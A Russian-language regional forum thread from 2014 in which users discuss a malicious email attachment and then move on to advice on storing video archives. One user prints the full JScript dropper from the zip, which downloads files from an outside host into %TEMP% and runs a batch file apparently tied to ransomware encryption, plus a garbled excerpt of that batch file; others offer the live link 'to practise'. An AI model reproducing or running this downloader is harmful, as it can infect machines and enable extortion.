• Добро пожаловать на Программы "Молодая семья" и "Социальная ипотека". Республика Татарстан..

Компьютеры

Автор JILUA, апреля 03, 2009, 16:43:15

« назад - далее »

Pуслан

Farid

Шамиль

Punch

Кому ссылку? Могу выслать потренироваться
Свеженькая, только сегодня получил опять
Компьютер, ноутбук, планшет, навигатор - диагностика, upgrate, переустановка систем, восстановление фото и документов, настройка Wi-Fi, 3G, 4G, обновление прошивки, дистанционная помощь, математика, тел.: 225-25-23

Pуслан

мне! мне! и побольше!)

Шамиль

Цитата: Pуслан от августа 20, 2014, 18:40:06
мне! мне! и побольше!)

Такой рисунок был не то в Чаяне, не то в Крокодиле, - "Дайте мне таблеток от жадности! Да побольше, доктор, побольше!"
:D

Punch

Ссылку не дам, её больше нет, сжег на костре :)
Лучше почитать про механизме заражения:
http://virusinfo.info/showthread.php?t=162092
Компьютер, ноутбук, планшет, навигатор - диагностика, upgrate, переустановка систем, восстановление фото и документов, настройка Wi-Fi, 3G, 4G, обновление прошивки, дистанционная помощь, математика, тел.: 225-25-23

Рыбников

Спасибо,  :) значит Каспер находит эту мразь? А остальные антивири?

Pуслан

Цитата: Punch от августа 21, 2014, 02:26:25
Ссылку не дам, её больше нет, сжег на костре :)
жаль((
Цитата: Punch от августа 21, 2014, 02:26:25
Лучше почитать про механизме заражения:
http://virusinfo.info/showthread.php?t=162092
даже дырявый IE не дает автоматом запустить bat/cmd/exe. Не говоря уж о нормальных браузерах. Так что не понятно как происходит запуск вредоносного кода в операционной системе..   Если бы javascript'ом можно было батники запускать, то в интернет вообще можно было бы не выходить, тут же получал бы где-нибудь format c: или т.п.

Punch

Цитата: Рыбников от августа 21, 2014, 10:54:20
Спасибо,  :) значит Каспер находит эту мразь? А остальные антивири?

Каспер сегодня находит, завтра нет! Механизм заражения меняется постоянно. Поэтому нет антивируса который спасет.
Есть только один совет - не нажимать на ссылки в письмах и еще, заметил, что в зараженном письме нет подписи и контактного телефона :)
только текст и ссылка

Punch

Цитата: Pуслан от августа 21, 2014, 11:13:26
жаль...
Есть комп для эксперимента?
Такая же ссылка есть здесь: __http://virusinfo.info/showthread.php?t=165149&s=e782640648103a7d5ccaa36febce62eb
дерзай :)

Pуслан

В общем ссылка на zip архив. У него внутри файл:

Код (Проект договора_типовые условия__2014 год_юридическая служба_согласовано для подписания_ОК_drweb_mailattachment_secure_doс .js) Выделить

///////////////// javascript obf ////////////////
/////////////////////

function reps(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}function CreateObject(c){return new ActiveXObject(c)}
var august="%TEMP%\\",cryptpay="%TEMP%\\paybtc.bat",WshShell=WScript.CreateObject("WScript.Shell"),autodomainchange="images",WshShell=CreateObject("WScript.Shell"),august=WshShell.ExpandEnvironmentStrings(august),bulletproof="www.metalrus.net",docume="%TEMP%\\docum.doc";try{reps("http://"+bulletproof+"/"+autodomainchange+"/document.btc",""+august+"docum.doc"),WshShell.Run(""+docume+"",1,0)}catch(word){}reps("http://"+bulletproof+"/"+autodomainchange+"/day.btc",""+august+"day.btc");
reps("http://"+bulletproof+"/"+autodomainchange+"/null.btc",""+august+"null.btc");reps("http://"+bulletproof+"/"+autodomainchange+"/sad.btc",""+august+"sad.btc");reps("http://"+bulletproof+"/"+autodomainchange+"/paybtc.btc",""+august+"paybtc.bat");

////////// moar //////////////

WshShell.Run(""+cryptpay+"",0,0);

//////////////  //ianz i kat it /////////////

//////////////////////versere///////////

По-умолчанию javascript файлы в винде открываются в Microsoft Windows Based Script Host (C:\Windows\System32\wscript.exe), у меня же открылся в блокноте)) Код простой. Выкачиваются три файлика. Третий выкачивается как bat файл, причем мне либо подменили его либо он хитрый какой-то, но вот часть его содержимого:

഍挊⁤┢䕔偍∥਍晩攠楸瑳∠琥浥╰灜祡牣瑰戮湩•潧潴愠瑵牯灥祬਍捥潨瀠祡牣灹㹴∠琥浥╰灜祡牣瑰戮湩ഢ挊⁤┢灡摰瑡╡ഢ爊湥浡⁥┢偁䑐呁╁杜畮杰•湧灵彧汯╤慲摮浯ഥ愊瑴楲⁢猭ⴠ⁨爭∠愥灰慤慴尥湧灵屧⸪∪਍瑡牴扩ⴠ⁳栭ⴠ⁲┢灡摰瑡╡杜畮杰ഢ搊汥⼠⁦焯∠愥灰慤慴尥湧灵屧⸪∪਍浲楤⁲猯⼠ⁱ┢灡摰瑡╡杜畮杰ഢ爊湥浡⁥┢整灭尥慤⹹瑢≣椠潣癮搮汬਍摣∠琥浥╰ഢ猊瑥氠湩ㅥ昽婪㤹噪剩㍖塆䙐眳䵲桔伱煄䵥界猹䑙䅴湋嘵照佢捑浹剫㑱䵍塲匸ㅴ橖允ഴ爊湥浡⁥┢整灭尥慳⹤瑢≣猠敤敬整攮數਍捥潨䬠祥吭灹㩥删䅓‾敧歮⹹瑢ൣ攊档敋⵹敌杮桴›〱㐲㸾朠湥祫戮捴਍捥潨丠浡ⵥ敒污›牣灹灴祡㸾朠湥祫戮捴਍捥潨丠浡ⵥ潃浭湥㩴挠祲瑰慰㹹‾敧歮⹹瑢ൣ攊档慎敭䔭慭汩›慰捹祲瑰杀慭汩挮浯㸾朠湥祫戮捴਍敲慮敭∠琥浥╰湜汵⹬瑢≣琠獡浫牧攮數਍敳⁴楬敮㴲浹癒䡯偬桖硅䑙䘳䍑潩塭牭浙㜱椳䥰汋穫䉁䉅䅁䥇睮契允䅉元䍕㙕收杵扉਍敳⁴楬敮㴳䅄䭁剃㉁慏畮瑐佥敨㕙䅂癃䕭渵朹牎㘶橓䭉稶椲䘱㕃楅刵㔱敪㑵䌲㘵儰䴳਍捥潨ⴠⴭⴭ䕂䥇⁎䝐⁐啐䱂䍉䬠奅䈠佌䭃ⴭⴭ㸭瀠祡牣灹⹴瑢ൣ攊档敖獲潩㩮䜠畮䝐瘠㸱‾慰捹祲瑰戮捴਍捥潨㸮‾慰捹祲瑰戮捴਍敳⁴潦歲樽൰攊档䥭䔰㙕收杵䕅䵁䑕套ㅑ㕬㑎瑉扐㌲䉕㙁浅汢㙹敚煮畩㥴ㅭ㍨捁䰶猸

только там раз в 30 больше этих иероглифов.

Ну и в итоге командой WshShell.Run(""+cryptpay+"",0,0); выполняется этот самый bat файл который и делает всё что хочет на компе.

Pуслан

В целом прикольная штука, для людей не знакомых с компьютерной безопасностью) Мой Microsoft Security Essentials с последними апдейтами не заругался ни на js ни на bat файлы)

Виновата тут разумееется винда, которая при запуске скачанного js-скрипта не выкатила страшное окно с предупреждением какое показывает при запуске скаченного exe файла.

Шамиль

Продолжайте-продолжайте, мы Вас внимательно слушаем!

:)

Шамиль

Кто юзал, подскажите плиз, какой девайс мне лучше пользовать для хранения архива видео, - обычный винт прикупить, или твердотельный диск, или тупо стопку болванок лазерных?  ::)
В последний год сто с лишним гектар примерно набралось. Это без фото ещё.

И заодно второй вопрос - может, если из мп4 в другой формат перевести (без потери качесвтва, ессно), таким образом можно место сэкономить?

context

Рыбников

Цитата: Шамиль от сентября 02, 2014, 21:39:18
Кто юзал, подскажите плиз, какой девайс мне лучше пользовать для хранения архива видео, - обычный винт прикупить, или твердотельный диск, или тупо стопку болванок лазерных?  ::)
В последний год сто с лишним гектар примерно набралось. Это без фото ещё.

И заодно второй вопрос - может, если из мп4 в другой формат перевести (без потери качесвтва, ессно), таким образом можно место сэкономить?
Лучше обычный винт, повышенной надежности, например вот тут почитай: http://www.seagate.com/files/www-content/product-content/sv35-fam/sv35.5/ru/docs/video-vs-desktop-mb645-1-1403ru.pdf
А твердотельник для этой цели не совсем удачный выбор будет, т.к. они еще пока глючат и не поддерживают многочисленную (более 100000 раз ... примерно) перезапись, а диски тоже давно как то делал, на некоторых почему то перестали читаться данные...

Pуслан

я за стопку! сам так храню, верняк!

Punch

Стопку нарезать опупеешь.
Я за "Лучше обычный винт, повышенной надежности" ©
у меня  такой, только поглядываю на смарт диска иногда.
А ужимаю при надобности с помощью Pinnacle Studio 16, только это тоже не быстро

Марат

Обычный винт+облако и еще один обычный винт если навернутся первые два  ;D
Я не являюсь сотрудником ГЖФ и прочих организаций, связанных с программами МС и СИ, поэтому задавать мне вопросы бесполезно, спрашивайте на форуме : )

Шамиль

Цитата: context от сентября 02, 2014, 21:50:32
В облако )

Насколько я понимаю, такие объёмы бесплатно никто не даст...

Цитата: Марат от сентября 03, 2014, 07:17:24
Обычный винт+облако и еще один обычный винт если навернутся первые два  ;D

Забыл "чукча не дурак, у чукчи стопка запасная есть"  :D

Шамиль

Цитата: Punch от сентября 02, 2014, 23:48:10
Стопку нарезать опупеешь.
Я за "Лучше обычный винт, повышенной надежности" ©
у меня  такой, только поглядываю на смарт диска иногда.
А ужимаю при надобности с помощью Pinnacle Studio 16, только это тоже не быстро

Сильно жмёт?

Кста, я заметил, что звуковая дорожка сдвигается при монтаже видео, не то в Пинакле, не то в Камтасии. Не в курсе, отчего так и как это обойти?

Марат

Цитата: Шамиль от сентября 03, 2014, 12:38:39
Насколько я понимаю, такие объёмы бесплатно никто не даст...
мейл.ру бесплатно терабайт раздавал :) , теперь вроде 100Гб дает
Цитата: Шамиль от сентября 03, 2014, 12:38:39
Забыл "чукча не дурак, у чукчи стопка запасная есть"  :D
у меня рабочий диск синхронизируется в облако, но на всякий случай копия важных данных еще лежит на внешнем диске (у яндекс.диска была например история когда он погрохал файлы на компах пользователей  :D )
Я не являюсь сотрудником ГЖФ и прочих организаций, связанных с программами МС и СИ, поэтому задавать мне вопросы бесполезно, спрашивайте на форуме : )

Шамиль

100 гектар не решит проблему.

А это самое, никто не считал, где дешевле обходится каждый байт?

Для меня главное - стоимость единицы информации и длительность хранения (надёжность сохранения).

Поэтому, кстати, сигейтовские винты для видео не нужны - зачем мне ихняя опупенная пропускная способность или возможность годами работать круглосуточно?

Farid

Беспроводной жесткий диск Seagate Wireless Plus. Данное устройство представлено в единственной модификации с объемом 1 ТБ и серым цветом корпуса. По расчетам компании, винчестер способен вместить до 300 HD-фильмов или сотню тысяч музыкальных композиций и фотографий. :-)

Seagate выпустила HDD емкостью 6 ТБ.  ;)